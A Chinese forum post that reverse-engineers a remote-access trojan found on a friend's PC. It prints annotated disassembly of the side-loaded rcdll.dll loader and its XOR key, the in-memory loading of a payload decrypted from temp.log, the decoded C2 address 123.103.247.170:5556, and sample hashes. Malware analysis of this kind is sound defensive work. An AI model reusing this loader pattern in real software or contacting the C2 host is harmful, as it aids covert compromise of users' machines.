
[调试逆向] [病毒木马] [原创]记一次远控木马的分析

2018-2-8 23:48 3726


0x0 概述

朋友电脑中毒,从他的电脑拷出来的...

0x1 环境 & 工具

环境: win7 x32 
工具: OD     IDA         DLL Export Viewer         LordPE

0x2 分析



control.txt 放了一段疑似Base64加密后的文本

尝试解密后
解密前: N1hZMG9NTjhvVHwyMDk5MjA=

解密后: 7XY0oMN8oT|209920

temp.log里则是乱码  肯定是被加密了


help.exe  好像是vs的资源编辑器 



rcdll.dll  加了UPX 这里用了esp定律直接脱掉  
看下他的两个导出函数
; RCDLL.Handler -- exported but empty: it returns immediately. The three
; nops after the ret are alignment padding, not reachable code.
100012E0 RCDLL.Handler     $  C3            retn
100012E1                      90            nop
100012E2                      90            nop
100012E3                      90            nop


;-----------------------------------------------------------------------
; RCDLL.RC -- exported from rcdll.dll (the UPX-packed stage-1 loader)
; Observed behaviour, from the listing below:
;   1. Reads <host exe dir>\control.txt (a base64 string) into a buffer.
;   2. Uses the raw file text as a mutex name; ERROR_ALREADY_EXISTS -> exit
;      (single-instance guard; the mutex name is a usable host IoC).
;   3. Base64-decodes the text, splits it on '|', copies the first token
;      ("7XY0oMN8oT") to the global 0x1000AB00 -- the XOR key for step 5.
;   4. Reads <host exe dir>\temp.log into a second buffer (ptr at 0x1000AC08).
;   5. XOR-decrypts it in place (sub_10001000), loads the result as a DLL
;      through a custom routine (0x100014B0, per the author's note),
;      resolves the export "Launch" and calls it.
;   6. Sleeps forever, so RC never returns to its caller.
; Regs:  ebx = 0 for the whole function (reused as NULL/FALSE);
;        ebp = CloseHandle from 10001151 onwards; edi/esi/ebp are reused
;        for handles, sizes and buffers (see line comments).
; Frame: 0x314 bytes, holding three 260-byte (MAX_PATH) buffers.
; Note:  no return value of CreateFileA/GetFileSize/ReadFile is checked.
;-----------------------------------------------------------------------
100010C0 RCDLL.RC         /$  81EC 14030000 sub esp,0x314                            ; 0x314-byte local frame
100010C6                  |.  53            push ebx
100010C7                  |.  55            push ebp
100010C8                  |.  56            push esi
100010C9                  |.  57            push edi
100010CA                  |.  33DB          xor ebx,ebx                              ; ebx = 0, used as NULL/FALSE below
100010CC                  |.  B9 40000000   mov ecx,0x40                             ; 0x40 dwords = 256 bytes
100010D1                  |.  33C0          xor eax,eax
100010D3                  |.  8D7C24 19     lea edi,dword ptr ss:[esp+0x19]
100010D7                  |.  885C24 18     mov byte ptr ss:[esp+0x18],bl            ; zero path buffer #1 at [esp+0x18]: 1+256+2+1 = 260 bytes
100010DB                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)  = MAX_PATH
100010E0                  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
100010E2                  |.  66:AB         stos word ptr es:[edi]                   ; |
100010E4                  |.  AA            stos byte ptr es:[edi]                   ; |
100010E5                  |.  8D4424 1C     lea eax,dword ptr ss:[esp+0x1C]          ; | same buffer (esp moved by the push above)
100010E9                  |.  50            push eax                                 ; |PathBuffer
100010EA                  |.  53            push ebx                                 ; |hModule => NULL  -> path of the host .exe, not of rcdll.dll
100010EB                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100010F1                  |.  8D4C24 18     lea ecx,dword ptr ss:[esp+0x18]
100010F5                  |.  51            push ecx                                 ; /Path
100010F6                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA  -> directory of the host .exe
100010FC                  |.  8D5424 18     lea edx,dword ptr ss:[esp+0x18]
10001100                  |.  68 48800010   push 10008048                            ; /StringToAdd = "\control.txt"
10001105                  |.  52            push edx                                 ; |ConcatString
10001106                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA  -> "<dir>\control.txt"
1000110C                  |.  53            push ebx                                 ; /hTemplateFile => NULL
1000110D                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
10001112                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001114                  |.  53            push ebx                                 ; |pSecurity => NULL
10001115                  |.  6A 03         push 0x3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117                  |.  8D4424 2C     lea eax,dword ptr ss:[esp+0x2C]          ; |
1000111B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001120                  |.  50            push eax                                 ; |FileName
10001121                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001127                  |.  8BF8          mov edi,eax                              ; edi = hFile; INVALID_HANDLE_VALUE is never tested
10001129                  |.  53            push ebx                                 ; /pFileSizeHigh => NULL
1000112A                  |.  57            push edi                                 ; |hFile
1000112B                  |.  895C24 18     mov dword ptr ss:[esp+0x18],ebx          ; | zero the bytes-read slot that ReadFile fills below
1000112F                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001135                  |.  8BE8          mov ebp,eax                              ; ebp = file size (unchecked)
10001137                  |.  55            push ebp
10001138                  |.  E8 070A0000   call 10001B44                            ; presumably allocates `size` bytes (result is used as ReadFile's buffer) -- TODO confirm
1000113D                  |.  83C4 04       add esp,0x4                              ; cdecl cleanup
10001140                  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
10001144                  |.  8BF0          mov esi,eax                              ; esi = buffer for the raw control.txt text
10001146                  |.  53            push ebx                                 ; /pOverlapped
10001147                  |.  51            push ecx                                 ; |pBytesRead
10001148                  |.  55            push ebp                                 ; |BytesToRead
10001149                  |.  56            push esi                                 ; |Buffer
1000114A                  |.  57            push edi                                 ; |hFile
1000114B                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile  (return value not checked)
10001151                  |.  8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C]        ;  kernel32.CloseHandle -- ebp keeps this address for the rest of RC
10001157                  |.  57            push edi                                 ; /hObject
10001158                  |.  FFD5          call ebp                                 ; \CloseHandle
1000115A                  |.  56            push esi                                 ; /MutexName = raw file text ("N1hZMG9NTjhvVHwyMDk5MjA=")
1000115B                  |.  53            push ebx                                 ; |InitialOwner
1000115C                  |.  53            push ebx                                 ; |pSecurity
1000115D                  |.  FF15 18700010 call dword ptr ds:[0x10007018]           ; \CreateMutexA  -- the mutex name doubles as a host IoC
10001163                  |.  8BF8          mov edi,eax                              ; edi = hMutex
10001165                  |.  FF15 14700010 call dword ptr ds:[0x10007014]           ; [GetLastError
1000116B                  |.  3D B7000000   cmp eax,0xB7                             ; 0xB7 = ERROR_ALREADY_EXISTS
10001170                  |.  75 0A         jnz short 1000117C                       ; first instance -> continue
10001172                  |.  57            push edi                                 ; /hObject
10001173                  |.  FFD5          call ebp                                 ; \CloseHandle
10001175                  |.  53            push ebx                                 ; /ExitCode
10001176                  |.  FF15 10700010 call dword ptr ds:[0x10007010]           ; \ExitProcess  -- a second instance terminates the whole host process
1000117C                  |>  B9 40000000   mov ecx,0x40
10001181                  |.  33C0          xor eax,eax
10001183                  |.  8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A                  |.  889C24 200200>mov byte ptr ss:[esp+0x220],bl           ; zero the 260-byte decode buffer at [esp+0x220]
10001191                  |.  F3:AB         rep stos dword ptr es:[edi]
10001193                  |.  66:AB         stos word ptr es:[edi]
10001195                  |.  AA            stos byte ptr es:[edi]
10001196                  |.  8B4424 10     mov eax,dword ptr ss:[esp+0x10]          ; eax = bytes read from control.txt
1000119A                  |.  8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1                  |.  52            push edx                                 ; output buffer (260 bytes on the stack)
100011A2                  |.  50            push eax                                 ; input length
100011A3                  |.  56            push esi                                 ; input = raw file text
100011A4                  |.  E8 67010000   call 10001310                            ; base64 decode (author's note); no bound on the output vs. the 260-byte buffer is visible here -- TODO confirm inside 10001310
100011A9                  |.  8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C]         ; decoded text ("7XY0oMN8oT|209920")
100011B0                  |.  68 44800010   push 10008044                            ; delimiter "|" (OllyDbg labels it UNICODE; likely just "|" followed by NULs)
100011B5                  |.  51            push ecx
100011B6                  |.  E8 E5080000   call 10001AA0                            ; presumably a strtok-style split; eax = first token -- TODO confirm
100011BB                  |.  83C4 14       add esp,0x14                             ; cleanup for both cdecl calls (3 + 2 args)
100011BE                  |.  50            push eax                                 ; /String2 = first token
100011BF                  |.  68 00AB0010   push 1000AB00                            ; |String1 = RCDLL.1000AB00  (global XOR key read by sub_10001000)
100011C4                  |.  FF15 0C700010 call dword ptr ds:[0x1000700C]           ; \lstrcpyA  (unbounded copy into the global)
100011CA                  |.  B9 40000000   mov ecx,0x40
100011CF                  |.  33C0          xor eax,eax
100011D1                  |.  8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8                  |.  889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl           ; zero path buffer #2 at [esp+0x11C]
100011DF                  |.  F3:AB         rep stos dword ptr es:[edi]
100011E1                  |.  66:AB         stos word ptr es:[edi]
100011E3                  |.  8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100011EF                  |.  52            push edx                                 ; |PathBuffer
100011F0                  |.  53            push ebx                                 ; |hModule => NULL
100011F1                  |.  AA            stos byte ptr es:[edi]                   ; | last byte of the zero-fill, scheduled between the pushes
100011F2                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100011F8                  |.  8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF                  |.  50            push eax                                 ; /Path
10001200                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
10001206                  |.  8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D                  |.  68 38800010   push 10008038                            ; /StringToAdd = "\temp.log"
10001212                  |.  51            push ecx                                 ; |ConcatString
10001213                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA  -> "<dir>\temp.log"
10001219                  |.  53            push ebx                                 ; /hTemplateFile
1000121A                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
1000121F                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001221                  |.  53            push ebx                                 ; |pSecurity
10001222                  |.  6A 01         push 0x1                                 ; |ShareMode = FILE_SHARE_READ
10001224                  |.  8D9424 300100>lea edx,dword ptr ss:[esp+0x130]         ; |
1000122B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001230                  |.  52            push edx                                 ; |FileName
10001231                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001237                  |.  8BF0          mov esi,eax                              ; esi = hFile (again unchecked)
10001239                  |.  53            push ebx                                 ; /pFileSizeHigh
1000123A                  |.  56            push esi                                 ; |hFile
1000123B                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001241                  |.  8BF8          mov edi,eax                              ; edi = size of temp.log
10001243                  |.  895C24 14     mov dword ptr ss:[esp+0x14],ebx          ; zero the bytes-read slot
10001247                  |.  57            push edi
10001248                  |.  E8 F7080000   call 10001B44                            ; same allocator as above (size bytes)
1000124D                  |.  83C4 04       add esp,0x4
10001250                  |.  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]
10001254                  |.  A3 08AC0010   mov dword ptr ds:[0x1000AC08],eax        ; global: pointer to the (still encrypted) temp.log image
10001259                  |.  53            push ebx                                 ; /pOverlapped
1000125A                  |.  51            push ecx                                 ; |pBytesRead
1000125B                  |.  57            push edi                                 ; |BytesToRead
1000125C                  |.  50            push eax                                 ; |Buffer
1000125D                  |.  56            push esi                                 ; |hFile
1000125E                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
10001264                  |.  56            push esi
10001265                  |.  FFD5          call ebp                                 ; CloseHandle(hFile)
10001267                  |.  8B5424 14     mov edx,dword ptr ss:[esp+0x14]
1000126B                  |.  52            push edx                                 ; arg2 = bytes read (file size)
1000126C                  |.  68 08AC0010   push 1000AC08                            ; arg1 = &g_buf (address of the pointer, not the buffer itself)
10001271                  |.  E8 8AFDFFFF   call 10001000                            ; decrypt in place: buf[i] ^= key[i % strlen(key)], key at 0x1000AB00
10001276                  |.  A1 08AC0010   mov eax,dword ptr ds:[0x1000AC08]        ; return value of 10001000 is discarded
1000127B                  |.  50            push eax
1000127C                  |.  E8 2F020000   call 100014B0                            ; load the decrypted buffer as a DLL (author's note); presumably a custom in-memory loader rather than LoadLibrary -- TODO confirm
10001281                  |.  83C4 0C       add esp,0xC                              ; cleanup for 10001000 (2 args) + 100014B0 (1 arg)
10001284                  |.  3BC3          cmp eax,ebx
10001286                  |.  A3 F8AA0010   mov dword ptr ds:[0x1000AAF8],eax        ; global: loaded module (0 on failure)
1000128B                  |.  74 3D         je short 100012CA                        ; load failed -> return
1000128D                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
10001292                  |.  50            push eax
10001293                  |.  E8 C8060000   call 10001960                            ; resolve the export "Launch" (GetProcAddress-equivalent, per author)
10001298                  |.  83C4 08       add esp,0x8
1000129B                  |.  3BC3          cmp eax,ebx
1000129D                  |.  74 19         je short 100012B8                        ; export missing -> cleanup path
1000129F                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"  (also passed as Launch's argument)
100012A4                  |.  FFD0          call eax                                 ; Launch("Launch")
100012A6                  |.  8B35 08700010 mov esi,dword ptr ds:[0x10007008]        ;  kernel32.Sleep
100012AC                  |.  83C4 04       add esp,0x4
100012AF                  |>  68 A0860100   /push 0x186A0                            ; 100000 ms
100012B4                  |.  FFD6          |call esi                                ; Sleep forever: RC never returns, keeping the host thread alive
100012B6                  |.^ EB F7         \jmp short 100012AF
100012B8                  |>  A1 F8AA0010   mov eax,dword ptr ds:[0x1000AAF8]
100012BD                  |.  3BC3          cmp eax,ebx
100012BF                  |.  74 09         je short 100012CA
100012C1                  |.  50            push eax
100012C2                  |.  E8 E9010000   call 100014B0                            ; the same loader routine, now called with the module value; presumably its unload/cleanup mode -- TODO confirm
100012C7                  |.  83C4 04       add esp,0x4
100012CA                  |>  5F            pop edi
100012CB                  |.  5E            pop esi
100012CC                  |.  5D            pop ebp
100012CD                  |.  5B            pop ebx
100012CE                  |.  81C4 14030000 add esp,0x314
100012D4                  \.  C3            retn



直接定位关键点 
(1) 读入文件目录下的control.txt
(2)用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 创建互斥体 ,如果互斥体已存在(创建失败),则结束进程



(3) 将  N1hZMG9NTjhvVHwyMDk5MjA=   进行解密    解密的结果与刚开始猜测的一样
(4) 把解密后内容  7XY0oMN8oT|209920   以 " | " 进行分割 并将   7XY0oMN8oT  用 lstrcpyA 复制到 0x1000AB00



(5) 读入同一目录下的 temp.log  并进行解密


解密前:

解密后:


解密 call

;-----------------------------------------------------------------------
; sub_10001000 -- in-place repeating-key XOR (the "decrypt call")
; C-equivalent: void __cdecl sub_10001000(char **pbuf, int len)
; In:    [esp+4] = pointer to the global that holds the buffer pointer
;        [esp+8] = len (compared as signed: jle / jl)
; Key:   NUL-terminated string at 0x1000AB00 ("7XY0oMN8oT", put there by RC)
; Effect: (*pbuf)[i] ^= key[i % strlen(key)] for 0 <= i < len
; Out:   eax = last XOR result; the caller ignores it
; Note:  XOR is symmetric, so the same routine encrypts and decrypts.
;        An empty key (strlen == 0) would make `idiv edi` fault.
;-----------------------------------------------------------------------
10001000  /$  53            push ebx
10001001  |.  57            push edi
10001002  |.  68 00AB0010   push 1000AB00                            ; /String = "7XY0oMN8oT"
10001007  |.  FF15 00700010 call dword ptr ds:[0x10007000]           ; \lstrlenA
1000100D  |.  8B5C24 10     mov ebx,dword ptr ss:[esp+0x10]          ; ebx = len (arg 2)
10001011  |.  33C9          xor ecx,ecx                              ; ecx = i = 0
10001013  |.  85DB          test ebx,ebx
10001015  |.  8BF8          mov edi,eax                              ; edi = strlen(key)
10001017  |.  7E 24         jle short 1000103D                       ; len <= 0 -> nothing to do
10001019  |.  55            push ebp
1000101A  |.  8B6C24 10     mov ebp,dword ptr ss:[esp+0x10]          ; ebp = pbuf (arg 1)
1000101E  |.  56            push esi
1000101F  |>  8B45 00       /mov eax,dword ptr ss:[ebp]              ; eax = *pbuf (re-read each iteration)
10001022  |.  8D3408        |lea esi,dword ptr ds:[eax+ecx]          ; esi = &buf[i]
10001025  |.  8BC1          |mov eax,ecx
10001027  |.  99            |cdq
10001028  |.  F7FF          |idiv edi                                ; edx = i % keylen (signed)
1000102A  |.  8A06          |mov al,byte ptr ds:[esi]                ; al = buf[i]
1000102C  |.  8A92 00AB0010 |mov dl,byte ptr ds:[edx+0x1000AB00]     ; dl = key[i % keylen]
10001032  |.  32C2          |xor al,dl
10001034  |.  41            |inc ecx
10001035  |.  3BCB          |cmp ecx,ebx
10001037  |.  8806          |mov byte ptr ds:[esi],al                ; buf[i] ^= key[i % keylen]
10001039  |.^ 7C E4         \jl short 1000101F                       ; while (++i < len), signed compare
1000103B  |.  5E            pop esi
1000103C  |.  5D            pop ebp
1000103D  |>  5F            pop edi
1000103E  |.  5B            pop ebx
1000103F  \.  C3            retn


解密函数伪代码

// Decompiler output for the in-place XOR routine at 0x10001000.
// a1 = pointer to the global holding the buffer pointer (the caller passes
//      0x1000AC08), a2 = buffer length.
// MEMORY[0x75BFCC62] is the import that the disassembly shows as lstrlenA.
char __cdecl sub_10001000(_DWORD *a1, int a2)
{
  int v2; // eax
  int v3; // ecx  -- byte index i
  int i; // edi   -- key length, strlen(byte_1000AB00)
  _BYTE *v5; // esi -- &buf[i]

  v2 = MEMORY[0x75BFCC62](byte_1000AB00); // 0x1000AB00 is where RC lstrcpyA'd "7XY0oMN8oT" (the XOR key)
  v3 = 0;
  // buf[i] ^= key[i % keylen] for i in [0, a2): repeating-key XOR, symmetric.
  // a2 <= 0 skips the loop; an empty key (i == 0) would divide by zero.
  for ( i = v2; v3 < a2; *v5 = v2 )
  {
    v5 = (_BYTE *)(*a1 + v3);
    LOBYTE(v2) = byte_1000AB00[v3++ % i] ^ *v5;
  }
  return v2; // low byte = last XOR result; the caller discards it
}


(6) 将解密后dll加载  并 GetProcAddress 获取 Launch函数地址  接着调用

Launch 

;-----------------------------------------------------------------------
; Launch -- export of the DLL decrypted from temp.log
; (the author cut the listing after the call at 00628F4B; the function
; continues past this excerpt)
; Observed: zeroes a 0x1F4-byte local buffer, base64-decodes the embedded
; config "MTIzLjEwMy4yNDcuMTcwfDU1NTZ8" -> "123.103.247.170|5556|" (author's
; note), splits it on '|', stores the host string at 0x64F630 and the port
; value at 0x64F734, then uses the raw base64 string as a second
; single-instance mutex name before entering the C2 logic at 00628B10.
; Both the mutex name and the host:port are host/network IoCs.
;-----------------------------------------------------------------------
00628E90    55              push ebp                                 ; OllyDbg's "kernel32.CloseHandle" here is a stale register note: RC left ebp = CloseHandle; this is ordinary frame setup
00628E91    8BEC            mov ebp,esp
00628E93    81EC F8010000   sub esp,0x1F8
00628E99    A1 10E26400     mov eax,dword ptr ds:[0x64E210]          ; looks like the MSVC /GS stack-cookie prologue (cookie ^ ebp -> [ebp-4])
00628E9E    33C5            xor eax,ebp
00628EA0    8945 FC         mov dword ptr ss:[ebp-0x4],eax
00628EA3    56              push esi
00628EA4    68 F3010000     push 0x1F3                               ; count
00628EA9    8D85 09FEFFFF   lea eax,dword ptr ss:[ebp-0x1F7]
00628EAF    6A 00           push 0x0                                 ; fill value
00628EB1    50              push eax                                 ; dst = local buf + 1
00628EB2    C685 08FEFFFF 0>mov byte ptr ss:[ebp-0x1F8],0x0          ; buf[0] = 0
00628EB9    E8 92B00000     call 00633F50                            ; presumably memset: 0x1F4-byte local buffer zeroed in total -- TODO confirm
00628EBE    83C4 0C         add esp,0xC
00628EC1    68 78F76400     push 0x64F778                            ; ASCII "MTIzLjEwMy4yNDcuMTcwfDU1NTZ8"  (hard-coded C2 config, base64)
00628EC6    FF15 FC316400   call dword ptr ds:[0x6431FC]             ; kernel32.lstrlenA
00628ECC    50              push eax                                 ; length
00628ECD    8D85 08FEFFFF   lea eax,dword ptr ss:[ebp-0x1F8]         ; eax = local buffer (passed in a register)
00628ED3    E8 1887FFFF     call 006215F0                            ; base64 decode into the local buffer (author's note); the source string is not visibly passed here -- TODO confirm
00628ED8    8D8D 08FEFFFF   lea ecx,dword ptr ss:[ebp-0x1F8]
00628EDE    68 F8916400     push 0x6491F8                            ; UNICODE "|"  -- delimiter
00628EE3    51              push ecx
00628EE4    E8 4AA20000     call 00633133                            ; presumably strtok-style split, first token -- TODO confirm
00628EE9    83C4 0C         add esp,0xC                              ; cleanup: 1 + 2 args
00628EEC    50              push eax                                 ; token 1 = "123.103.247.170"
00628EED    68 30F66400     push 0x64F630                            ; global: C2 host string
00628EF2    FF15 08326400   call dword ptr ds:[0x643208]             ; kernel32.lstrcpyA
00628EF8    68 F8916400     push 0x6491F8                            ; UNICODE "|"
00628EFD    6A 00           push 0x0                                 ; NULL -> continue the previous split
00628EFF    E8 2FA20000     call 00633133                            ; token 2 = "5556"
00628F04    50              push eax
00628F05    E8 D99F0000     call 00632EE3                            ; presumably atoi-like (string -> port number) -- TODO confirm
00628F0A    68 F8916400     push 0x6491F8                            ; UNICODE "|"
00628F0F    6A 00           push 0x0
00628F11    A3 34F76400     mov dword ptr ds:[0x64F734],eax          ; global: C2 port
00628F16    E8 18A20000     call 00633133                            ; third split call (the decoded text ends in "|"); result unused in this excerpt
00628F1B    83C4 14         add esp,0x14                             ; cleanup: 2 + 1 + 2 args
00628F1E    68 78F76400     push 0x64F778                            ; ASCII "MTIzLjEwMy4yNDcuMTcwfDU1NTZ8"  -- reused as the mutex name
00628F23    6A 00           push 0x0
00628F25    6A 00           push 0x0
00628F27    FF15 FC306400   call dword ptr ds:[0x6430FC]             ; kernel32.CreateMutexA
00628F2D    8BF0            mov esi,eax
00628F2F    FF15 8C306400   call dword ptr ds:[0x64308C]             ; kernel32.GetLastError
00628F35    3D B7000000     cmp eax,0xB7                             ; ERROR_ALREADY_EXISTS
00628F3A    75 0F           jnz short 00628F4B
00628F3C    56              push esi
00628F3D    FF15 48306400   call dword ptr ds:[0x643048]             ; kernel32.CloseHandle
00628F43    6A 00           push 0x0
00628F45    FF15 F8306400   call dword ptr ds:[0x6430F8]             ; kernel32.ExitProcess
00628F4B    E8 C0FBFFFF     call 00628B10                            ; enters the main functionality (author's note); listing stops here


(7) 同样的套路   将 MTIzLjEwMy4yNDcuMTcwfDU1NTZ8 用Base64解密  得到上线地址:123.103.247.170 以及上线端口: 5556
(8) 用  MTIzLjEwMy4yNDcuMTcwfDU1NTZ8 创建互斥体, 互斥体已存在(创建失败)则退出软件
(9) 发送上线封包.......
解密前: MTIzLjEwMy4yNDcuMTcwfDU1NTZ8

解密后: 123.103.247.170|5556|



0x3 总结


没啥好总结的....
第一次发帖不小心点了返回 也是悲催...
表述能力有限,文中有错误的地方望大家指出..
最后提前祝大家 狗年旺旺,旺事如意! 

样本
MD5: ed06199d9c9f30d5a7fbae0e8e49b95f
SHA1: 54c497ed337691ef507dd63ee9d7a21669a0352f



最新回复 (3)
自然卷 2018-2-9 00:07
不明觉厉
八岛 1 2018-3-20 15:55
C&C部分没多少呀